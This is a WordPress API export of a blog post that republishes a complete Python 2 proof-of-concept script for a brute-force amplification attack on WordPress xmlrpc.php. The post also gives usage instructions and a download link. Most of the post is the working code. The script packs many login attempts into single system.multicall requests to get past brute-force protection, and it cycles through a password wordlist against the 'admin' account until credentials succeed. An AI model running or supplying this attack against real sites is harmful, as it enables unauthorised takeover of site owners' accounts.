{"id":2638,"date":"2015-10-19T02:34:58","date_gmt":"2015-10-19T02:34:58","guid":{"rendered":"http:\/\/www.pir8geek.com\/?p=2638"},"modified":"2015-10-19T02:34:58","modified_gmt":"2015-10-19T02:34:58","slug":"wordpress-xml-rpc-brute-force-exploit-by-1n3","status":"publish","type":"post","link":"https:\/\/www.jameseduard.com\/?p=2638","title":{"rendered":"WordPress XML RPC Brute Force Exploit by 1N3"},"content":{"rendered":"

WordPress XML-RPC Brute Force Amplification PoC by 1N3, this is a small PoC exploit to launch a brute force amplification attack on affected WordPress sites.
\nUSAGE:<\/p>\n

.\/wp-xml-brute http:\/\/target.com\/xmlrpc.php passwords.txt\n<\/pre>\n
#!\/usr\/bin\/python\n# WordPress XML-RPC Brute Force Amplification PoC by 1N3\n# Last Updated: 20151018\n# https:\/\/crowdshield.com\n#\n# ABOUT: This exploit launches a brute force amplification attack on target WordPress sites. Since XMLRPC allows multiple auth calls per request, amplification is possible and standard brute force protection will not block the attack.\n#\n# USAGE: .\/wp-xml-brute http:\/\/target.com\/xmlrpc.php passwords.txt\n#\nimport urllib, urllib2, sys, getopt\nfrom array import *\nclass bcolors:\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\ndef main(argv):\n\targc = len(argv)\n\tif argc <= 1:\n\t\tprint bcolors.OKBLUE + \" __      __                        .___                                             \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\/  \\    \/  \\   ____   _______    __| _\/ ______   _______    ____     ______   ______\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\\   \\\/\\\/   \/  \/  _ \\  \\_  __ \\  \/ __ |  \\____ \\  \\_  __ \\ _\/ __ \\   \/  ___\/  \/  ___\/\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \" \\        \/  (  <_> )  |  | \\\/ \/ \/_\/ |  |  |_> >  |  | \\\/ \\  ___\/   \\___ \\   \\___ \\ \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"  \\__\/\\  \/    \\____\/   |__|    \\____ |  |   __\/   |__|     \\___  > \/____  > \/____  >\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"       \\\/                           \\\/  |__|                   \\\/       \\\/       \\\/ \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\t\t\\ \/       _  _  __    _  _    ___ __    __ _  _  __ __\" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\t\t X |V||  |_)|_)\/     |_)|_)| | | |_    |_ \/ \\|_)\/  |_ \" + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + '\t\t\/ \\| ||__| \\|  \\__   |_)| \\|_| | |__   |  \\_\/| \\\\\\__|__' + bcolors.ENDC\n\t\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\t\tprint \"\"\n\t\tprint bcolors.OKBLUE + \"+ -- --=[XML-RPC Brute Force Script v20151018 by 1N3 @ https:\/\/crowdshield.com\" + bcolors.ENDC\n        \tprint bcolors.OKBLUE + \"+ -- --=[usage: %s http:\/\/wordpress.org\/xmlrpc.php passwords.txt\" % (argv[0]) + bcolors.ENDC\n        \tsys.exit(0)\n\turl = argv[1] # SET TARGET\n\twordlist = argv[2] # SET CUSTOM WORDLIST\n\tusers = ['admin'] # USERS LIST, ADD MORE AS NEEDED OR CHANGE DEFAULT ADMIN\n\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \" __      __                        .___                                             \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\/  \\    \/  \\   ____   _______    __| _\/ ______   _______    ____     ______   ______\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\\   \\\/\\\/   \/  \/  _ \\  \\_  __ \\  \/ __ |  \\____ \\  \\_  __ \\ _\/ __ \\   \/  ___\/  \/  ___\/\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \" \\        \/  (  <_> )  |  | \\\/ \/ \/_\/ |  |  |_> >  |  | \\\/ \\  ___\/   \\___ \\   \\___ \\ \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"  \\__\/\\  \/    \\____\/   |__|    \\____ |  |   __\/   |__|     \\___  > \/____  > \/____  >\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"       \\\/                           \\\/  |__|                   \\\/       \\\/       \\\/ \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\t\t\\ \/       _  _  __    _  _    ___ __    __ _  _  __ __\" + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\t\t X |V||  |_)|_)\/     |_)|_)| | | |_    |_ \/ \\|_)\/  |_ \" + bcolors.ENDC\n\tprint bcolors.OKBLUE + '\t\t\/ \\| ||__| \\|  \\__   |_)| \\|_| | |__   |  \\_\/| \\\\\\__|__' + bcolors.ENDC\n\tprint bcolors.OKBLUE + \"\" + bcolors.ENDC\n\tprint \"\"\n\tprint bcolors.OKBLUE + \"+ -- --=[XML-RPC Brute Force Script v20151018 by 1N3 @ https:\/\/crowdshield.com\" + bcolors.ENDC\n\tprint bcolors.WARNING + \"+ -- --=[Brute forcing target: \" + url + \"\" + bcolors.ENDC\n\tdata1 = '<?xml version=\"1.0\"?><methodCall><methodName>system.multicall<\/methodName><params><param><value><array><data>'\n\tdata2 = \"\"\n\tdata3 = '<\/data><\/array><\/value><\/param><\/params><\/methodCall>'\n\tnum_lines = sum(1 for line in open(wordlist))\n\tf = open(wordlist)\n\tlines = f.readlines()\n\tpasswds = f.read().splitlines()\n\tf.close()\n\tnum = 0 # CURRENT LINE POSITION\n\tcount = 0 # HOW MANY AUTHS TO SEND PER REQUEST\n\twhile num < num_lines:\n\t\t# SEND 50 AUTH REQUESTS PER REQUEST\n\t\tif count < 1000:\n\t\t\tnum += 1\n\t\t\tcount += 1\n\t\t\t# REACHED END OF FILE, SEND REQUEST AND ATTEMPT BRUTE FORCE...\n\t\t\tif num >= num_lines:\n\t\t\t\tdata = \"\" + data1 + \"\" + data2 + \"\" + data3\n\t\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\t\trsp = urllib2.urlopen(req)\n\t\t\t\tcontent = rsp.read()\n\t\t\t\t#print content\n\t\t\t\tif \"admin\" in content.lower():\n\t\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[Brute Force Amplification Attack Successful!\" + bcolors.ENDC\n\t\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Starting Brute Force Enumeration...\" + bcolors.ENDC\n\t\t\t\t\tfor user in users:\n\t\t\t\t\t\twhile num <= num_lines:\n\t\t\t\t\t\t\tnum -= 1\n\t\t\t\t\t\t\tpasswd = str(lines[num])\n\t\t\t\t\t\t\tdata = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodCall><methodName>wp.getUsersBlogs<\/methodName><params><param><value>' + user + '<\/value><\/param><param><value>' + passwd + '<\/value><\/param><\/params><\/methodCall>'\n\t\t\t\t\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\t\t\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\t\t\t\t\trsp = urllib2.urlopen(req)\n\t\t\t\t\t\t\tcontent = rsp.read()\n\t\t\t\t\t\t\t#print content\n\t\t\t\t\t\t\tif \"incorrect\" in content.lower():\n\t\t\t\t\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Wrong username or password: \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\t\telif \"admin\" in content.lower():\n\t\t\t\t\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[w00t! User found! WordPress is pwned! \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\t\t\tsys.exit(0)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Invalid response from target\" + bcolors.ENDC\n\t\t\t\t\t\t\t\tsys.exit(0)\n\t\t\t\telse:\n\t\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Brute force failed\" + bcolors.ENDC\n\t\t\t\tbreak\n\t\t\t\tsys.exit(0)\n\t\t\telse:\n\t\t\t\tpasswd = str(lines[num])\n\t\t\t\tfor user in users:\n\t\t\t\t\tdata2 += str('<value><struct><member><name>methodName<\/name><value><string>wp.getUsersBlogs<\/string><\/value><\/member><member><name>params<\/name><value><array><data><value><array><data><value><string>'+user+'<\/string><\/value><value><string>'+passwd+'<\/string><\/value><\/data><\/array><\/value><\/data><\/array><\/value><\/member><\/struct><\/value>')\n\t\t# WE'VE REACHED THE LIMIT, SEND THE REQUEST AND RESET COUNTER\n\t\telse:\n\t\t\tcount = 0\n\t\t\tdata = \"\" + data1 + \"\" + data2 + \"\" + data3\n\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\trsp = urllib2.urlopen(req)\n\t\t\tcontent = rsp.read()\n\t\t\t#print content\n\t\t\tdata2 = \"\"\n\t\t\tif \"admin\" in content.lower():\n\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[Brute Force Amplification Attack Successful!\" + bcolors.ENDC\n\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Starting Brute Force Enumeration...\" + bcolors.ENDC\n\t\t\t\tfor user in users:\n\t\t\t\t\twhile num <= num_lines:\n\t\t\t\t\t\tpasswd = str(lines[num])\n\t\t\t\t\t\tdata = '<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodCall><methodName>wp.getUsersBlogs<\/methodName><params><param><value>' + user + '<\/value><\/param><param><value>' + passwd + '<\/value><\/param><\/params><\/methodCall>'\n\t\t\t\t\t\theader = 'headers={\"Content-Type\": \"application\/xml\"}'\n\t\t\t\t\t\treq = urllib2.Request(url, data, headers={'Content-Type': 'application\/xml'})\n\t\t\t\t\t\trsp = urllib2.urlopen(req)\n\t\t\t\t\t\tcontent = rsp.read()\n\t\t\t\t\t\tnum -= 1\n\t\t\t\t\t\t#print content\n\t\t\t\t\t\tif \"incorrect\" in content.lower():\n\t\t\t\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Wrong username or password: \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\telif \"admin\" in content.lower():\n\t\t\t\t\t\t\tprint bcolors.OKGREEN + \"+ -- --=[w00t! User found! WordPress is pwned! \" + user + \"\/\" + passwd + \"\" + bcolors.ENDC\n\t\t\t\t\t\t\tsys.exit(0)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint bcolors.WARNING + \"+ -- --=[Invalid response from target\" + bcolors.ENDC\n\t\t\t\t\t\t\tsys.exit(0)\n\t\t\telse:\n\t\t\t\tprint bcolors.FAIL + \"+ -- --=[Brute force failed\" + bcolors.ENDC\nmain(sys.argv)<\/pre>\n
 
\nDownload WordPress XML RPC Brute Force Exploit at Github by crowdshield<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
WordPress XML-RPC Brute Force Amplification PoC by 1N3, this is a small PoC exploit to launch a brute force amplification attack on affected WordPress sites. USAGE: .\/wp-xml-brute http:\/\/target.com\/xmlrpc.php passwords.txt #!\/usr\/bin\/python # WordPress XML-RPC Brute Force Amplification PoC by 1N3 # Last Updated: 20151018 # https:\/\/crowdshield.com # # ABOUT: This exploit launches a brute force amplification<\/p>\n","protected":false},"author":1,"featured_media":2639,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[318,154,541,278],"tags":[588,589,569],"class_list":["post-2638","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-password-attacks","category-pentesting-tools","category-python","category-web-application","tag-1n3","tag-crowshield","tag-wordpress"],"_links":{"self":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2638","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2638"}],"version-history":[{"count":0,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=\/wp\/v2\/posts\/2638\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2638"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2638"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jameseduard.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2638"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}